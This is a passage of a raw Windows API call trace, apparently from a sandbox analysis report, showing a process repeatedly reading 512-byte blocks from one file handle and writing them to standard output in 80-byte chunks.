lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.930] GetFileType (hFile=0x50) returned 0x1 [0202.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.930] GetFileType (hFile=0x50) returned 0x1 [0202.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.930] WriteFile (in: hFile=0x50, lpBuffer=0x12efac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.930] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.930] GetFileType (hFile=0x50) returned 0x1 [0202.930] _get_osfhandle (_FileHandle=1) returned 0x50 
[0202.930] WriteFile (in: hFile=0x50, lpBuffer=0x12effc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12effc*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.931] GetFileType (hFile=0x50) returned 0x1 [0202.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.931] WriteFile (in: hFile=0x50, lpBuffer=0x12f04c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f04c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.931] GetFileType (hFile=0x50) returned 0x1 [0202.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.931] WriteFile (in: hFile=0x50, lpBuffer=0x12f09c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f09c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.931] GetFileType (hFile=0x50) returned 0x1 [0202.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.931] WriteFile (in: hFile=0x50, lpBuffer=0x12f0ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f0ec*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.931] GetFileType (hFile=0x50) returned 0x1 [0202.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.931] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.931] GetFileType (hFile=0x50) returned 0x1 [0202.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.931] WriteFile (in: hFile=0x50, 
lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e190*=0x20, lpOverlapped=0x0) returned 1 [0202.931] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.931] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e17c | out: lpNewFilePointer=0x0) returned 1 [0202.931] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.931] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.931] GetFileType (hFile=0x50) returned 0x1 [0202.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.931] GetFileType (hFile=0x50) returned 0x1 [0202.931] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.931] WriteFile (in: hFile=0x50, lpBuffer=0x12efac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.932] GetFileType (hFile=0x50) returned 0x1 [0202.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.932] WriteFile (in: hFile=0x50, lpBuffer=0x12effc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12effc*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.932] GetFileType (hFile=0x50) returned 0x1 [0202.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.932] WriteFile (in: hFile=0x50, lpBuffer=0x12f04c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f04c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.932] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0202.932] GetFileType (hFile=0x50) returned 0x1 [0202.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.932] WriteFile (in: hFile=0x50, lpBuffer=0x12f09c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f09c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.932] GetFileType (hFile=0x50) returned 0x1 [0202.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.932] WriteFile (in: hFile=0x50, lpBuffer=0x12f0ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f0ec*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.932] GetFileType (hFile=0x50) returned 0x1 [0202.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.932] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.932] GetFileType (hFile=0x50) returned 0x1 [0202.932] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.932] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e190*=0x20, lpOverlapped=0x0) returned 1 [0202.932] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.932] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e17c | out: lpNewFilePointer=0x0) returned 1 [0202.933] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.933] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, 
lpOverlapped=0x0) returned 1 [0202.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.933] GetFileType (hFile=0x50) returned 0x1 [0202.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.933] GetFileType (hFile=0x50) returned 0x1 [0202.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.933] WriteFile (in: hFile=0x50, lpBuffer=0x12efac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.933] GetFileType (hFile=0x50) returned 0x1 [0202.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.933] WriteFile (in: hFile=0x50, lpBuffer=0x12effc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12effc*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.933] GetFileType (hFile=0x50) returned 0x1 [0202.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.933] WriteFile (in: hFile=0x50, lpBuffer=0x12f04c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f04c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.933] GetFileType (hFile=0x50) returned 0x1 [0202.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.933] WriteFile (in: hFile=0x50, lpBuffer=0x12f09c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f09c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.933] GetFileType (hFile=0x50) returned 0x1 [0202.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.933] WriteFile (in: hFile=0x50, lpBuffer=0x12f0ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 
| out: lpBuffer=0x12f0ec*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.933] GetFileType (hFile=0x50) returned 0x1 [0202.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.933] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.933] GetFileType (hFile=0x50) returned 0x1 [0202.933] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.933] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e190*=0x20, lpOverlapped=0x0) returned 1 [0202.934] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.934] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e17c | out: lpNewFilePointer=0x0) returned 1 [0202.934] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.934] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.934] GetFileType (hFile=0x50) returned 0x1 [0202.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.934] GetFileType (hFile=0x50) returned 0x1 [0202.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.934] WriteFile (in: hFile=0x50, lpBuffer=0x12efac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.934] GetFileType (hFile=0x50) returned 0x1 [0202.934] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0202.934] WriteFile (in: hFile=0x50, lpBuffer=0x12effc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12effc*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.934] GetFileType (hFile=0x50) returned 0x1 [0202.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.934] WriteFile (in: hFile=0x50, lpBuffer=0x12f04c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f04c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.934] GetFileType (hFile=0x50) returned 0x1 [0202.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.934] WriteFile (in: hFile=0x50, lpBuffer=0x12f09c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f09c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.934] GetFileType (hFile=0x50) returned 0x1 [0202.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.934] WriteFile (in: hFile=0x50, lpBuffer=0x12f0ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f0ec*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.935] GetFileType (hFile=0x50) returned 0x1 [0202.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.935] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.935] GetFileType (hFile=0x50) returned 0x1 [0202.935] _get_osfhandle (_FileHandle=1) returned 0x50 
[0202.935] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e190*=0x20, lpOverlapped=0x0) returned 1 [0202.935] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.935] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e17c | out: lpNewFilePointer=0x0) returned 1 [0202.935] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.935] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.935] GetFileType (hFile=0x50) returned 0x1 [0202.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.935] GetFileType (hFile=0x50) returned 0x1 [0202.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.935] WriteFile (in: hFile=0x50, lpBuffer=0x12efac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.935] GetFileType (hFile=0x50) returned 0x1 [0202.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.935] WriteFile (in: hFile=0x50, lpBuffer=0x12effc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12effc*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.935] GetFileType (hFile=0x50) returned 0x1 [0202.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.935] WriteFile (in: hFile=0x50, lpBuffer=0x12f04c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f04c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 
[0202.935] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.935] GetFileType (hFile=0x50) returned 0x1 [0202.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.936] WriteFile (in: hFile=0x50, lpBuffer=0x12f09c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f09c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.936] GetFileType (hFile=0x50) returned 0x1 [0202.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.936] WriteFile (in: hFile=0x50, lpBuffer=0x12f0ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f0ec*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.936] GetFileType (hFile=0x50) returned 0x1 [0202.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.936] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.936] GetFileType (hFile=0x50) returned 0x1 [0202.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.936] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e190*=0x20, lpOverlapped=0x0) returned 1 [0202.936] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.936] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e17c | out: lpNewFilePointer=0x0) returned 1 [0202.936] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.936] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, 
lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.936] GetFileType (hFile=0x50) returned 0x1 [0202.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.936] GetFileType (hFile=0x50) returned 0x1 [0202.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.936] WriteFile (in: hFile=0x50, lpBuffer=0x12efac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.936] GetFileType (hFile=0x50) returned 0x1 [0202.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.936] WriteFile (in: hFile=0x50, lpBuffer=0x12effc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12effc*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.936] GetFileType (hFile=0x50) returned 0x1 [0202.936] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.936] WriteFile (in: hFile=0x50, lpBuffer=0x12f04c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f04c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.937] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.937] GetFileType (hFile=0x50) returned 0x1 [0202.937] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.937] WriteFile (in: hFile=0x50, lpBuffer=0x12f09c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f09c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.937] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.937] GetFileType (hFile=0x50) returned 0x1 [0202.937] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.937] WriteFile (in: hFile=0x50, lpBuffer=0x12f0ec*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f0ec*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.937] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.937] GetFileType (hFile=0x50) returned 0x1 [0202.937] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.937] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.937] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.937] GetFileType (hFile=0x50) returned 0x1 [0202.937] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.937] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e190*=0x20, lpOverlapped=0x0) returned 1 [0202.937] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.937] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e17c | out: lpNewFilePointer=0x0) returned 1 [0202.937] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.937] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.937] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.937] GetFileType (hFile=0x50) returned 0x1 [0202.938] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.938] GetFileType (hFile=0x50) returned 0x1 [0202.938] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.938] WriteFile (in: hFile=0x50, lpBuffer=0x12efac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.938] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.938] GetFileType 
(hFile=0x50) returned 0x1 [0202.938] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.938] WriteFile (in: hFile=0x50, lpBuffer=0x12effc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12effc*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.938] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.938] GetFileType (hFile=0x50) returned 0x1 [0202.938] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.938] WriteFile (in: hFile=0x50, lpBuffer=0x12f04c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f04c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.938] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.938] GetFileType (hFile=0x50) returned 0x1 [0202.938] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.938] WriteFile (in: hFile=0x50, lpBuffer=0x12f09c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f09c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.938] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.938] GetFileType (hFile=0x50) returned 0x1 [0202.938] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.938] WriteFile (in: hFile=0x50, lpBuffer=0x12f0ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f0ec*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.938] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.938] GetFileType (hFile=0x50) returned 0x1 [0202.938] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.938] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.939] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.939] GetFileType (hFile=0x50) returned 0x1 [0202.939] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0202.939] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e190*=0x20, lpOverlapped=0x0) returned 1 [0202.939] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.939] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e17c | out: lpNewFilePointer=0x0) returned 1 [0202.939] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.939] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.939] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.939] GetFileType (hFile=0x50) returned 0x1 [0202.939] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.939] GetFileType (hFile=0x50) returned 0x1 [0202.939] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.939] WriteFile (in: hFile=0x50, lpBuffer=0x12efac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.939] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.939] GetFileType (hFile=0x50) returned 0x1 [0202.939] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.939] WriteFile (in: hFile=0x50, lpBuffer=0x12effc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12effc*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.939] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.939] GetFileType (hFile=0x50) returned 0x1 [0202.939] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.939] WriteFile (in: hFile=0x50, lpBuffer=0x12f04c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f04c*, 
